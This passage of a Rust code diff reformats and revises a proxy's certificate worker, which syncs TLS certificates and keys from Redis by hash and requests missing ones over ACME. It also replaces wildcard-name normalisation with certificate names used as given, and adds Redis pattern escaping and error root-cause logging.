SHA256 hash) /// Using Arc> instead of MemoryCache to avoid lifetime issues -static CERTIFICATE_HASH_CACHE: once_cell::sync::OnceCell>>> = once_cell::sync::OnceCell::new(); +static CERTIFICATE_HASH_CACHE: once_cell::sync::OnceCell< + Arc>>, +> = once_cell::sync::OnceCell::new(); /// Get the global certificate store pub fn get_certificate_store() -> Arc>>> { - CERTIFICATE_STORE.get_or_init(|| Arc::new(tokio::sync::RwLock::new(None))).clone() + CERTIFICATE_STORE + .get_or_init(|| Arc::new(tokio::sync::RwLock::new(None))) + .clone() } /// Get the global certificate hash cache /// Cache size: 1000 entries (should be enough for most deployments) -fn get_certificate_hash_cache() -> Arc>> { - CERTIFICATE_HASH_CACHE.get_or_init(|| { - Arc::new(tokio::sync::RwLock::new(std::collections::HashMap::new())) - }).clone() +fn get_certificate_hash_cache() +-> Arc>> { + CERTIFICATE_HASH_CACHE + .get_or_init(|| Arc::new(tokio::sync::RwLock::new(std::collections::HashMap::new()))) + .clone() } /// Certificate worker that fetches SSL certificates from Redis @@ -86,7 +102,11 @@ pub struct CertificateWorker { } impl CertificateWorker { - pub fn new(certificate_path: String, upstreams_path: String, refresh_interval_secs: u64) -> Self { + pub fn new( + certificate_path: String, + upstreams_path: String, + refresh_interval_secs: u64, + ) -> Self { Self { certificate_path, upstreams_path, @@ -111,13 +131,23 @@ impl Worker for CertificateWorker { set_upstreams_path(upstreams_path.clone()); // Initial fetch on startup - download all certificates immediately - log::info!("[{}] Starting certificate download from Redis on service startup...", worker_name); + log::info!( + "[{}] Starting certificate download from Redis on service startup...", + worker_name + ); match fetch_certificates_from_redis(&certificate_path, &upstreams_path).await { Ok(_) => { - log::info!("[{}] Successfully downloaded all certificates from Redis on startup", worker_name); + log::info!( + "[{}] Successfully downloaded all certificates from Redis on startup", + worker_name + ); } Err(e) => { - log::warn!("[{}] Failed to fetch certificates from Redis on startup: {}", worker_name, e); + log::warn!( + "[{}] Failed to fetch certificates from Redis on startup: {}", + worker_name, + e + ); log::warn!("[{}] Will retry on next scheduled interval", worker_name); } } @@ -129,7 +159,8 @@ impl Worker for CertificateWorker { // Set up periodic expiration check (every 6 hours) let mut expiration_check_interval = interval(Duration::from_secs(6 * 60 * 60)); // 6 hours - expiration_check_interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Skip); + expiration_check_interval + .set_missed_tick_behavior(tokio::time::MissedTickBehavior::Skip); // Skip the first tick - we'll check after the first certificate fetch let mut first_expiration_check = true; @@ -203,15 +234,17 @@ async fn fetch_domains_from_upstreams(upstreams_path: &str) -> Result Result<()> { - let redis_manager = RedisManager::get() - .context("Redis manager not initialized")?; + let redis_manager = RedisManager::get().context("Redis manager not initialized")?; // Parse upstreams.yaml to get domains and their certificate mappings use serde_yaml; @@ -230,7 +263,10 @@ async fn fetch_certificates_from_redis(certificate_path: &str, upstreams_path: & for (hostname, host_config) in upstreams { // Only process domains that need certificates if !host_config.needs_certificate() { - log::debug!("Skipping certificate check for domain {} (no ACME config and ssl_enabled: false)", hostname); + log::debug!( + "Skipping certificate check for domain {} (no ACME config and ssl_enabled: false)", + hostname + ); continue; } let cert_name = host_config.certificate.clone(); @@ -243,7 +279,10 @@ async fn fetch_certificates_from_redis(certificate_path: &str, upstreams_path: & return Ok(()); } - log::info!("Checking certificates for {} domain(s) from Redis (will skip download if hashes match)", domain_cert_map.len()); + log::info!( + "Checking certificates for {} domain(s) from Redis (will skip download if hashes match)", + domain_cert_map.len() + ); let mut connection = redis_manager.get_connection(); let mut certificate_configs = Vec::new(); @@ -255,8 +294,10 @@ async fn fetch_certificates_from_redis(certificate_path: &str, upstreams_path: & // Create certificate directory if it doesn't exist if !cert_dir.exists() { log::info!("Creating certificate directory: {}", certificate_path); - std::fs::create_dir_all(cert_dir) - .context(format!("Failed to create certificate directory: {}", certificate_path))?; + std::fs::create_dir_all(cert_dir).context(format!( + "Failed to create certificate directory: {}", + certificate_path + ))?; log::info!("Certificate directory created: {}", certificate_path); } else { log::debug!("Certificate directory already exists: {}", certificate_path); @@ -265,30 +306,28 @@ async fn fetch_certificates_from_redis(certificate_path: &str, upstreams_path: & for (domain, cert_name_opt) in &domain_cert_map { // Use certificate name if specified, otherwise use domain name let cert_name = cert_name_opt.as_ref().unwrap_or(domain); - // Normalize certificate name (remove wildcard prefix if present) - let normalized_cert_name = cert_name.strip_prefix("*.").unwrap_or(cert_name); // Check certificate hash from Redis before downloading // Get prefix from RedisManager let prefix = RedisManager::get() .map(|rm| rm.get_prefix().to_string()) .unwrap_or_else(|_| "ssl-storage".to_string()); - let hash_key = format!("{}:{}:metadata:certificate_hash", prefix, normalized_cert_name); + let hash_key = format!("{}:{}:metadata:certificate_hash", prefix, cert_name); let remote_hash: Option = redis::cmd("GET") .arg(&hash_key) .query_async(&mut connection) .await - .context(format!("Failed to get certificate hash for domain: {}", domain))?; + .context(format!( + "Failed to get certificate hash for domain: {}", + domain + ))?; // Check in-memory cache first for local hash let hash_cache = get_certificate_hash_cache(); - // Get file paths first - use normalized certificate name for file naming - // This matches the filename format used by ACME (which uses normalized domain) - // ACME saves as: {sanitized_domain}.crt where domain is normalized (wildcard prefix removed) - let sanitized_cert_name = normalized_cert_name.replace('.', "_").replace('*', "_"); - let cert_path = cert_dir.join(format!("{}.crt", sanitized_cert_name)); - let key_path = cert_dir.join(format!("{}.key", sanitized_cert_name)); + // Get file paths using the certificate name as-is + let cert_path = cert_dir.join(format!("{}.crt", cert_name)); + let key_path = cert_dir.join(format!("{}.key", cert_name)); // Check local certificates first before checking Redis // This allows using local certificates even if Redis is unavailable or certificate not in Redis yet @@ -323,40 +362,66 @@ async fn fetch_certificates_from_redis(certificate_path: &str, upstreams_path: & if let Some(remote) = &remote_hash { if remote == local { // Hashes match - use local certificate - log::debug!("Certificate hash matches for domain: {} (hash: {}), using local certificate", domain, remote); + log::debug!( + "Certificate hash matches for domain: {} (hash: {}), using local certificate", + domain, + remote + ); // Add existing certificate to config without re-downloading certificate_configs.push(CertificateConfig { cert_path: cert_path.to_string_lossy().to_string(), key_path: key_path.to_string_lossy().to_string(), }); skipped_count += 1; - log::debug!("Added existing certificate config for domain: {} -> cert: {}, key: {}", - domain, cert_path.display(), key_path.display()); + log::debug!( + "Added existing certificate config for domain: {} -> cert: {}, key: {}", + domain, + cert_path.display(), + key_path.display() + ); false // Don't download } else { - log::debug!("Certificate hash mismatch for domain: {} (remote: {}, local: {}), downloading new certificate from Redis", domain, remote, local); + log::debug!( + "Certificate hash mismatch for domain: {} (remote: {}, local: {}), downloading new certificate from Redis", + domain, + remote, + local + ); true // Download - hash changed in Redis } } else { // No Redis hash, but we have local certificate - use it - log::debug!("No Redis hash found for domain: {}, but local certificate exists, using local certificate", domain); + log::debug!( + "No Redis hash found for domain: {}, but local certificate exists, using local certificate", + domain + ); // Add existing certificate to config without re-downloading certificate_configs.push(CertificateConfig { cert_path: cert_path.to_string_lossy().to_string(), key_path: key_path.to_string_lossy().to_string(), }); skipped_count += 1; - log::debug!("Added existing local certificate config for domain: {} -> cert: {}, key: {}", - domain, cert_path.display(), key_path.display()); + log::debug!( + "Added existing local certificate config for domain: {} -> cert: {}, key: {}", + domain, + cert_path.display(), + key_path.display() + ); false // Don't download - use local certificate } } else if remote_hash.is_some() { // No local certificate, but Redis has one - download it - log::debug!("No local certificate found for domain: {}, but Redis hash exists, downloading from Redis", domain); + log::debug!( + "No local certificate found for domain: {}, but Redis hash exists, downloading from Redis", + domain + ); true // Download from Redis } else { // No local certificate and no Redis hash - check if certificate exists in Redis - log::debug!("No local certificate and no Redis hash for domain: {}, will check if certificate exists in Redis", domain); + log::debug!( + "No local certificate and no Redis hash for domain: {}, will check if certificate exists in Redis", + domain + ); true // Check Redis for certificate }; @@ -373,11 +438,20 @@ async fn fetch_certificates_from_redis(certificate_path: &str, upstreams_path: & // Redis stores certificates with keys: // - {prefix}:{cert_name}:live:fullchain // - {prefix}:{cert_name}:live:privkey - let fullchain_key = format!("{}:{}:live:fullchain", prefix, normalized_cert_name); - let privkey_key = format!("{}:{}:live:privkey", prefix, normalized_cert_name); + let fullchain_key = format!("{}:{}:live:fullchain", prefix, cert_name); + let privkey_key = format!("{}:{}:live:privkey", prefix, cert_name); - log::info!("Fetching certificate for domain: {} (using cert: {}, normalized: {}, prefix: {})", domain, cert_name, normalized_cert_name, prefix); - log::info!("Fullchain key: '{}', Privkey key: '{}'", fullchain_key, privkey_key); + log::info!( + "Fetching certificate for domain: {} (using cert: {}, prefix: {})", + domain, + cert_name, + prefix + ); + log::info!( + "Fullchain key: '{}', Privkey key: '{}'", + fullchain_key, + privkey_key + ); let fullchain: Option> = redis::cmd("GET") .arg(&fullchain_key) @@ -391,7 +465,8 @@ async fn fetch_certificates_from_redis(certificate_path: &str, upstreams_path: & .await .context(format!("Failed to get private key for domain: {}", domain))?; - log::info!("Redis GET results for domain {}: fullchain={}, privkey={}", + log::info!( + "Redis GET results for domain {}: fullchain={}, privkey={}", domain, if fullchain.is_some() { "Some" } else { "None" }, if privkey.is_some() { "Some" } else { "None" } @@ -417,79 +492,132 @@ async fn fetch_certificates_from_redis(certificate_path: &str, upstreams_path: & }; if !fullchain_str.contains("-----BEGIN CERTIFICATE-----") { - log::warn!("Fullchain for domain {} does not appear to be in PEM format", domain); + log::warn!( + "Fullchain for domain {} does not appear to be in PEM format", + domain + ); continue; } if !privkey_str.contains("-----BEGIN") { - log::warn!("Private key for domain {} does not appear to be in PEM format", domain); + log::warn!( + "Private key for domain {} does not appear to be in PEM format", + domain + ); continue; } // Write certificates to certificate directory - // Use sanitized certificate name for file names (already set above) + // Use certificate name as-is for file names (already set above) // cert_path and key_path are already set using cert_name - log::debug!("Writing certificate to: {} and key to: {}", cert_path.display(), key_path.display()); + log::debug!( + "Writing certificate to: {} and key to: {}", + cert_path.display(), + key_path.display() + ); // Write fullchain to file // Normalize the fullchain to ensure proper PEM format: // - Ensure newline between certificates (END CERTIFICATE and BEGIN CERTIFICATE) // - Ensure file ends with newline let normalized_fullchain = normalize_pem_chain(&fullchain_str); - let mut cert_file = std::fs::File::create(&cert_path) - .context(format!("Failed to create certificate file for domain: {} at path: {}", domain, cert_path.display()))?; - cert_file.write_all(normalized_fullchain.as_bytes()) - .context(format!("Failed to write certificate file for domain: {} to path: {}", domain, cert_path.display()))?; - cert_file.sync_all() - .context(format!("Failed to sync certificate file for domain: {} at path: {}", domain, cert_path.display()))?; + let mut cert_file = std::fs::File::create(&cert_path).context(format!( + "Failed to create certificate file for domain: {} at path: {}", + domain, + cert_path.display() + ))?; + cert_file + .write_all(normalized_fullchain.as_bytes()) + .context(format!( + "Failed to write certificate file for domain: {} to path: {}", + domain, + cert_path.display() + ))?; + cert_file.sync_all().context(format!( + "Failed to sync certificate file for domain: {} at path: {}", + domain, + cert_path.display() + ))?; // Write private key to file // Normalize the key to ensure proper PEM format let normalized_key = normalize_pem_chain(&privkey_str); - let mut key_file = std::fs::File::create(&key_path) - .context(format!("Failed to create key file for domain: {} at path: {}", domain, key_path.display()))?; - key_file.write_all(normalized_key.as_bytes()) - .context(format!("Failed to write key file for domain: {} to path: {}", domain, key_path.display()))?; - key_file.sync_all() - .context(format!("Failed to sync key file for domain: {} at path: {}", domain, key_path.display()))?; + let mut key_file = std::fs::File::create(&key_path).context(format!( + "Failed to create key file for domain: {} at path: {}", + domain, + key_path.display() + ))?; + key_file + .write_all(normalized_key.as_bytes()) + .context(format!( + "Failed to write key file for domain: {} to path: {}", + domain, + key_path.display() + ))?; + key_file.sync_all().context(format!( + "Failed to sync key file for domain: {} at path: {}", + domain, + key_path.display() + ))?; // Calculate hash from raw bytes (before normalization) to match Redis hash calculation // Redis calculates hash from: fullchain (raw bytes) + key (raw bytes) // We need to match this exactly, not from normalized files - use sha2::{Sha256, Digest}; + use sha2::{Digest, Sha256}; let mut hasher = Sha256::new(); hasher.update(&fullchain_bytes); hasher.update(&privkey_bytes); let calculated_hash = format!("{:x}", hasher.finalize()); downloaded_count += 1; - log::info!("Successfully downloaded and saved certificate for domain: {} to {}", domain, cert_path.display()); + log::info!( + "Successfully downloaded and saved certificate for domain: {} to {}", + domain, + cert_path.display() + ); // Verify files were written correctly if !cert_path.exists() { - log::warn!("Certificate file does not exist after write: {}", cert_path.display()); + log::warn!( + "Certificate file does not exist after write: {}", + cert_path.display() + ); continue; } if !key_path.exists() { - log::warn!("Key file does not exist after write: {}", key_path.display()); + log::warn!( + "Key file does not exist after write: {}", + key_path.display() + ); continue; } // Store local hash in memory cache after successful download // Use the hash calculated from raw bytes (matching Redis calculation) - let cert_key = cert_name.to_string(); - let hash_cache = get_certificate_hash_cache(); - let mut cache = hash_cache.write().await; + let cert_key = cert_name.to_string(); + let hash_cache = get_certificate_hash_cache(); + let mut cache = hash_cache.write().await; cache.insert(cert_key, calculated_hash.clone()); - log::debug!("Stored local hash in memory cache for domain: {} -> {} (calculated from raw bytes, matching Redis)", domain, calculated_hash); + log::debug!( + "Stored local hash in memory cache for domain: {} -> {} (calculated from raw bytes, matching Redis)", + domain, + calculated_hash + ); // Verify hash matches Redis hash if let Some(remote_hash) = &remote_hash { if calculated_hash != *remote_hash { - log::warn!("Hash mismatch after download for domain {}: calculated={}, redis={}. This should not happen!", - domain, calculated_hash, remote_hash); + log::warn!( + "Hash mismatch after download for domain {}: calculated={}, redis={}. This should not happen!", + domain, + calculated_hash, + remote_hash + ); } else { - log::debug!("Hash verified: calculated hash matches Redis hash for domain: {}", domain); + log::debug!( + "Hash verified: calculated hash matches Redis hash for domain: {}", + domain + ); } } @@ -498,36 +626,77 @@ async fn fetch_certificates_from_redis(certificate_path: &str, upstreams_path: & cert_path: cert_path.to_string_lossy().to_string(), key_path: key_path.to_string_lossy().to_string(), }); - log::debug!("Added certificate config for domain: {} -> cert: {}, key: {}", - domain, cert_path.display(), key_path.display()); + log::debug!( + "Added certificate config for domain: {} -> cert: {}, key: {}", + domain, + cert_path.display(), + key_path.display() + ); } (Some(_), None) => { missing_count += 1; - log::warn!("Certificate fullchain found but private key missing in Redis for domain: {} (cert: {}, key: {})", domain, cert_name, privkey_key); + log::warn!( + "Certificate fullchain found but private key missing in Redis for domain: {} (cert: {}, key: {})", + domain, + cert_name, + privkey_key + ); // Request certificate from ACME using certificate name (with wildcard if configured) - if let Err(e) = request_certificate_from_acme(domain, normalized_cert_name, &certificate_path).await { - log::warn!("Failed to request certificate from ACME for domain {}: {}", domain, e); + if let Err(e) = + request_certificate_from_acme(domain, cert_name, &certificate_path).await + { + log::warn!( + "Failed to request certificate from ACME for domain {}: {}. Reason: {}", + domain, + e, + error_root_cause(&e) + ); } else { - log::debug!("Successfully requested certificate from ACME for domain: {} (certificate: {})", domain, cert_name); + log::debug!( + "Successfully requested certificate from ACME for domain: {} (certificate: {})", + domain, + cert_name + ); } } (None, Some(_)) => { missing_count += 1; - log::warn!("Certificate private key found but fullchain missing in Redis for domain: {} (cert: {}, key: {})", domain, cert_name, fullchain_key); + log::warn!( + "Certificate private key found but fullchain missing in Redis for domain: {} (cert: {}, key: {})", + domain, + cert_name, + fullchain_key + ); // Request certificate from ACME using certificate name (with wildcard if configured) - if let Err(e) = request_certificate_from_acme(domain, normalized_cert_name, &certificate_path).await { - log::warn!("Failed to request certificate from ACME for domain {}: {}", domain, e); + if let Err(e) = + request_certificate_from_acme(domain, cert_name, &certificate_path).await + { + log::warn!( + "Failed to request certificate from ACME for domain {}: {}. Reason: {}", + domain, + e, + error_root_cause(&e) + ); } else { - log::debug!("Successfully requested certificate from ACME for domain: {} (certificate: {})", domain, cert_name); + log::debug!( + "Successfully requested certificate from ACME for domain: {} (certificate: {})", + domain, + cert_name + ); } } (None, None) => { missing_count += 1; - log::warn!("Certificate not found in Redis for domain: {} (cert: {}, checked keys: fullchain='{}', privkey='{}')", - domain, cert_name, fullchain_key, privkey_key); + log::warn!( + "Certificate not found in Redis for domain: {} (cert: {}, checked keys: fullchain='{}', privkey='{}')", + domain, + cert_name, + fullchain_key, + privkey_key + ); // Try to list matching keys to help debug - let pattern = format!("{}:{}:*", prefix, normalized_cert_name); + let pattern = format!("{}:{}:*", prefix, escape_redis_pattern(cert_name)); let keys_result: Result, _> = redis::cmd("KEYS") .arg(&pattern) .query_async(&mut connection) @@ -535,7 +704,12 @@ async fn fetch_certificates_from_redis(certificate_path: &str, upstreams_path: & match keys_result { Ok(keys) => { if !keys.is_empty() { - log::debug!("Found {} matching keys for pattern '{}': {:?}", keys.len(), pattern, keys); + log::debug!( + "Found {} matching keys for pattern '{}': {:?}", + keys.len(), + pattern, + keys + ); } else { log::warn!("No keys found matching pattern '{}'", pattern); } @@ -547,10 +721,21 @@ async fn fetch_certificates_from_redis(certificate_path: &str, upstreams_path: & // Request certificate from ACME server if enabled // Use certificate name (with wildcard if configured) instead of hostname - if let Err(e) = request_certificate_from_acme(domain, normalized_cert_name, &certificate_path).await { - log::warn!("Failed to request certificate from ACME for domain {}: {}", domain, e); + if let Err(e) = + request_certificate_from_acme(domain, cert_name, &certificate_path).await + { + log::warn!( + "Failed to request certificate from ACME for domain {}: {}. Reason: {}", + domain, + e, + error_root_cause(&e) + ); } else { - log::debug!("Successfully requested certificate from ACME for domain: {} (certificate: {})", domain, cert_name); + log::debug!( + "Successfully requested certificate from ACME for domain: {} (certificate: {})", + domain, + cert_name + ); } } } @@ -558,20 +743,35 @@ async fn fetch_certificates_from_redis(certificate_path: &str, upstreams_path: & // Log summary if skipped_count > 0 { - log::debug!("Skipped {} certificate(s) due to hash matches (using existing files)", skipped_count); + log::debug!( + "Skipped {} certificate(s) due to hash matches (using existing files)", + skipped_count + ); } if downloaded_count > 0 { - log::info!("Downloaded {} new/updated certificate(s) from Redis", downloaded_count); + log::info!( + "Downloaded {} new/updated certificate(s) from Redis", + downloaded_count + ); } if missing_count > 0 { log::warn!("{} certificate(s) not found in Redis", missing_count); } if !certificate_configs.is_empty() { - log::debug!("Successfully processed {} certificate(s) ({} downloaded, {} skipped)", - certificate_configs.len(), downloaded_count, skipped_count); - log::debug!("Certificate configs to load: {:?}", - certificate_configs.iter().map(|c| format!("cert: {}, key: {}", c.cert_path, c.key_path)).collect::>()); + log::debug!( + "Successfully processed {} certificate(s) ({} downloaded, {} skipped)", + certificate_configs.len(), + downloaded_count, + skipped_count + ); + log::debug!( + "Certificate configs to load: {:?}", + certificate_configs + .iter() + .map(|c| format!("cert: {}, key: {}", c.cert_path, c.key_path)) + .collect::>() + ); // Update the certificate store // Use "medium" as default TLS grade (can be made configurable) @@ -581,32 +781,60 @@ async fn fetch_certificates_from_redis(certificate_path: &str, upstreams_path: & let store = get_certificate_store(); let mut guard = store.write().await; *guard = Some(Arc::new(certificates)); - log::debug!("Updated certificate store with {} certificates", certificate_configs.len()); + log::debug!( + "Updated certificate store with {} certificates", + certificate_configs.len() + ); } None => { - log::error!("Failed to create Certificates object from fetched configs. This usually means one or more certificate files are invalid or cannot be loaded."); - log::error!("Attempted to load {} certificate configs", certificate_configs.len()); + log::error!( + "Failed to create Certificates object from fetched configs. This usually means one or more certificate files are invalid or cannot be loaded." + ); + log::error!( + "Attempted to load {} certificate configs", + certificate_configs.len() + ); for config in &certificate_configs { log::error!(" - cert: {}, key: {}", config.cert_path, config.key_path); } } } } else { - log::warn!("No certificates were processed. Check if certificates exist in Redis for the domains listed in upstreams.yaml, or if all certificates were skipped due to hash matches but files are missing"); + log::warn!( + "No certificates were processed. Check if certificates exist in Redis for the domains listed in upstreams.yaml, or if all certificates were skipped due to hash matches but files are missing" + ); } Ok(()) } +fn escape_redis_pattern(value: &str) -> String { + value + .replace('\\', "\\\\") + .replace('*', "\\*") + .replace('?', "\\?") + .replace('[', "\\[") +} + +fn error_root_cause(err: &anyhow::Error) -> String { + err.chain() + .last() + .map(|e| e.to_string()) + .unwrap_or_else(|| err.to_string()) +} + /// Global ACME config store -static ACME_CONFIG: once_cell::sync::OnceCell>>> = once_cell::sync::OnceCell::new(); +static ACME_CONFIG: once_cell::sync::OnceCell< + Arc>>, +> = once_cell::sync::OnceCell::new(); /// Global upstreams path store -static UPSTREAMS_PATH: once_cell::sync::OnceCell>>> = once_cell::sync::OnceCell::new(); +static UPSTREAMS_PATH: once_cell::sync::OnceCell>>> = + once_cell::sync::OnceCell::new(); /// Set the global ACME config (called from main.rs) /// Can be called multiple times to update the config at runtime -pub fn set_acme_config(config: crate::cli::AcmeConfig) { +pub fn set_acme_config(config: crate::core::cli::AcmeConfig) { let store = ACME_CONFIG.get_or_init(|| Arc::new(std::sync::RwLock::new(None))); let mut guard = store.write().unwrap(); let was_development = guard.as_ref().map(|c| c.development).unwrap_or(false); @@ -618,11 +846,20 @@ pub fn set_acme_config(config: crate::cli::AcmeConfig) { // Log if development mode changes if was_development != is_development { - log::warn!("ACME development mode changed: {} -> {}. Existing certificates may have been issued with the previous mode. Consider clearing certificates and restarting.", was_development, is_development); + log::warn!( + "ACME development mode changed: {} -> {}. Existing certificates may have been issued with the previous mode. Consider clearing certificates and restarting.", + was_development, + is_development + ); } *guard = Some(config); - log::info!("ACME config updated: enabled={}, development={}, port={}", enabled, is_development, port); + log::info!( + "ACME config updated: enabled={}, development={}, port={}", + enabled, + is_development, + port + ); } /// Set the global upstreams path (called from certificate worker) @@ -633,12 +870,14 @@ fn set_upstreams_path(path: String) { } /// Get the global ACME config -pub async fn get_acme_config() -> Option { +pub async fn get_acme_config() -> Option { let store = ACME_CONFIG.get()?; let guard = tokio::task::spawn_blocking({ let store = Arc::clone(store); move || store.read().unwrap().clone() - }).await.ok()?; + }) + .await + .ok()?; guard } @@ -648,17 +887,19 @@ async fn get_upstreams_path() -> Option { let guard = tokio::task::spawn_blocking({ let store = Arc::clone(store); move || store.read().unwrap().clone() - }).await.ok()?; + }) + .await + .ok()?; guard } /// Request a certificate from ACME server for a domain pub async fn request_certificate_from_acme( domain: &str, - normalized_domain: &str, + cert_name: &str, _certificate_path: &str, ) -> Result<()> { - use crate::acme::{Config, ConfigOpts, request_cert}; + use crate::proxy::acme::{Config, ConfigOpts, request_cert}; use std::path::PathBuf; // Check if ACME is enabled @@ -666,52 +907,69 @@ pub async fn request_certificate_from_acme( Some(config) if config.enabled => { // Log which ACME server will be used if config.development { - log::warn!("ACME development mode is ENABLED - certificates will be issued from Let's Encrypt STAGING server (not trusted by browsers)"); + log::warn!( + "ACME development mode is ENABLED - certificates will be issued from Let's Encrypt STAGING server (not trusted by browsers)" + ); } else { - log::info!("ACME development mode is DISABLED - certificates will be issued from Let's Encrypt PRODUCTION server"); + log::info!( + "ACME development mode is DISABLED - certificates will be issued from Let's Encrypt PRODUCTION server" + ); } config - }, + } Some(_) => { - log::debug!("ACME is disabled, skipping certificate request for domain: {}", domain); + log::debug!( + "ACME is disabled, skipping certificate request for domain: {}", + domain + ); return Ok(()); } None => { - log::debug!("ACME config not available, skipping certificate request for domain: {}", domain); + log::debug!( + "ACME config not available, skipping certificate request for domain: {}", + domain + ); return Ok(()); } }; // Get email - use from config or default - let email = acme_config.email + let email = acme_config + .email .unwrap_or_else(|| "admin@example.com".to_string()); // Get Redis URL from RedisManager if available - let redis_url = crate::redis::RedisManager::get() + let redis_url = crate::storage::redis::RedisManager::get() .ok() .and_then(|_| { // Use ACME config Redis URL, or try to get from RedisManager - acme_config.redis_url.clone() + acme_config + .redis_url + .clone() .or_else(|| std::env::var("REDIS_URL").ok()) }); // Read challenge type from upstreams.yaml // Get upstreams path from global store (set by certificate worker) or use default - let upstreams_path = get_upstreams_path().await + let upstreams_path = get_upstreams_path() + .await .unwrap_or_else(|| "/root/synapse/upstreams.yaml".to_string()); // Determine the domain to request from ACME - // If normalized_domain is different from domain, it means a certificate name was specified + // If cert_name is different from domain, it means a certificate name was specified // In that case, we should request the certificate for the certificate domain, not the hostname let (acme_domain, use_dns, domain_email, is_wildcard) = { // Try to read challenge type and certificate config from upstreams.yaml if let Ok(yaml_content) = tokio::fs::read_to_string(&upstreams_path).await { - if let Ok(parsed) = serde_yaml::from_str::(&yaml_content) { + if let Ok(parsed) = serde_yaml::from_str::(&yaml_content) + { if let Some(upstreams) = &parsed.upstreams { if let Some(host_config) = upstreams.get(domain) { // Check if a certificate name is specified (different from domain) let cert_name_opt = host_config.certificate.as_ref(); - let acme_wildcard = host_config.acme.as_ref() + let acme_wildcard = host_config + .acme + .as_ref() .map(|a| a.wildcard) .unwrap_or(false); @@ -735,7 +993,7 @@ pub async fn request_certificate_from_acme( // No certificate name specified - use hostname domain if acme_wildcard && !domain.starts_with("*.") { // Wildcard is set but domain doesn't have *. prefix - format!("*.{}", normalized_domain) + format!("*.{}", cert_name) } else { domain.to_string() } @@ -754,39 +1012,59 @@ pub async fn request_certificate_from_acme( }; let use_dns = challenge_type == "dns-01"; - let domain_email = host_config.acme.as_ref() + let domain_email = host_config + .acme + .as_ref() .and_then(|a| a.email.clone()) .or_else(|| Some(email.clone())); let is_wildcard = requested_domain.starts_with("*.") || acme_wildcard; - log::info!("ACME request: hostname={}, certificate={:?}, requested_domain={}, wildcard={}, challenge={}", - domain, cert_name_opt, requested_domain, is_wildcard, challenge_type); + log::info!( + "ACME request: hostname={}, certificate={:?}, requested_domain={}, wildcard={}, challenge={}", + domain, + cert_name_opt, + requested_domain, + is_wildcard, + challenge_type + ); (requested_domain, use_dns, domain_email, is_wildcard) } else { // Domain not found in upstreams, auto-detect - // If normalized_domain != domain, it means a certificate name was passed - let is_wildcard = domain.starts_with("*.") || normalized_domain != domain; + let is_wildcard = domain.starts_with("*.") || cert_name.starts_with("*."); let requested_domain = if domain.starts_with("*.") { domain.to_string() - } else if normalized_domain != domain { - // Certificate name was specified - assume wildcard - format!("*.{}", normalized_domain) + } else if cert_name != domain { + // Certificate name was specified + if cert_name.starts_with("*.") { + cert_name.to_string() + } else { + format!("*.{}", cert_name) + } } else { domain.to_string() }; let use_dns = is_wildcard; // Use DNS-01 for wildcard certificates - log::info!("Domain {} not found in upstreams.yaml, auto-detecting (requested: {}, wildcard: {}, dns: {})", - domain, requested_domain, is_wildcard, use_dns); + log::info!( + "Domain {} not found in upstreams.yaml, auto-detecting (requested: {}, wildcard: {}, dns: {})", + domain, + requested_domain, + is_wildcard, + use_dns + ); (requested_domain, use_dns, Some(email.clone()), is_wildcard) } } else { // No upstreams, auto-detect - let is_wildcard = domain.starts_with("*.") || normalized_domain != domain; + let is_wildcard = domain.starts_with("*.") || cert_name.starts_with("*."); let requested_domain = if domain.starts_with("*.") { domain.to_string() - } else if normalized_domain != domain { - format!("*.{}", normalized_domain) + } else if cert_name != domain { + if cert_name.starts_with("*.") { + cert_name.to_string() + } else { + format!("*.{}", cert_name) + } } else { domain.to_string() }; @@ -795,11 +1073,15 @@ pub async fn request_certificate_from_acme( } } else { // Failed to parse, auto-detect - let is_wildcard = domain.starts_with("*.") || normalized_domain != domain; + let is_wildcard = domain.starts_with("*.") || cert_name.starts_with("*."); let requested_domain = if domain.starts_with("*.") { domain.to_string() - } else if normalized_domain != domain { - format!("*.{}", normalized_domain) + } else if cert_name != domain { + if cert_name.starts_with("*.") { + cert_name.to_string() + } else { + format!("*.{}", cert_name) + } } else { domain.to_string() }; @@ -808,11 +1090,15 @@ pub async fn request_certificate_from_acme( } } else { // Failed to read, auto-detect - let is_wildcard = domain.starts_with("*.") || normalized_domain != domain; + let is_wildcard = domain.starts_with("*.") || cert_name.starts_with("*."); let requested_domain = if domain.starts_with("*.") { domain.to_string() - } else if normalized_domain != domain { - format!("*.{}", normalized_domain) + } else if cert_name != domain { + if cert_name.starts_with("*.") { + cert_name.to_string() + } else { + format!("*.{}", cert_name) + } } else { domain.to_string() }; @@ -823,7 +1109,7 @@ pub async fn request_certificate_from_acme( // Create domain config for ACME let mut domain_storage_path = PathBuf::from(&acme_config.storage_path); - domain_storage_path.push(normalized_domain); + domain_storage_path.push(cert_name); let mut cert_path = domain_storage_path.clone(); cert_path.push("cert.pem"); @@ -832,7 +1118,7 @@ pub async fn request_certificate_from_acme( let static_path = domain_storage_path.clone(); // Get Redis SSL config if available - let redis_ssl = crate::redis::RedisManager::get() + let redis_ssl = crate::storage::redis::RedisManager::get() .ok() .and_then(|_| { // Try to get SSL config from global config if available @@ -854,10 +1140,10 @@ pub async fn request_certificate_from_acme( development: acme_config.development, dns_lookup_max_attempts: Some(100), dns_lookup_delay_seconds: Some(10), - storage_type: { - // Always use Redis (storage_type option is kept for compatibility but always uses Redis) - Some("redis".to_string()) - }, + storage_type: { + // Always use Redis (storage_type option is kept for compatibility but always uses Redis) + Some("redis".to_string()) + }, redis_url, lock_ttl_seconds: Some(900), redis_ssl, @@ -866,13 +1152,24 @@ pub async fn request_certificate_from_acme( }; // Request certificate from ACME - log::info!("Requesting certificate from ACME: hostname={} -> certificate_domain={} (wildcard: {}, dns: {})", - domain, acme_domain, is_wildcard, use_dns); - - request_cert(&acme_config_internal).await - .context(format!("Failed to request certificate from ACME for hostname: {} (requested domain: {})", domain, acme_domain))?; - - log::info!("Certificate requested successfully from ACME: hostname={}, certificate_domain={}. It will be available in Redis after processing.", domain, acme_domain); + log::info!( + "Requesting certificate from ACME: hostname={} -> certificate_domain={} (wildcard: {}, dns: {})", + domain, + acme_domain, + is_wildcard, + use_dns + ); + + request_cert(&acme_config_internal).await.context(format!( + "Failed to request certificate from ACME for hostname: {} (requested domain: {})", + domain, acme_domain + ))?; + + log::info!( + "Certificate requested successfully from ACME: hostname={}, certificate_domain={}. It will be available in Redis after processing.", + domain, + acme_domain + ); // After requesting, the certificate should be in Redis (if using Redis storage) // The next refresh cycle will pick it up automatically @@ -882,10 +1179,10 @@ pub async fn request_certificate_from_acme( /// Check certificates for expiration and renew if expiring within 60 days async fn check_and_renew_expiring_certificates(upstreams_path: &str) -> 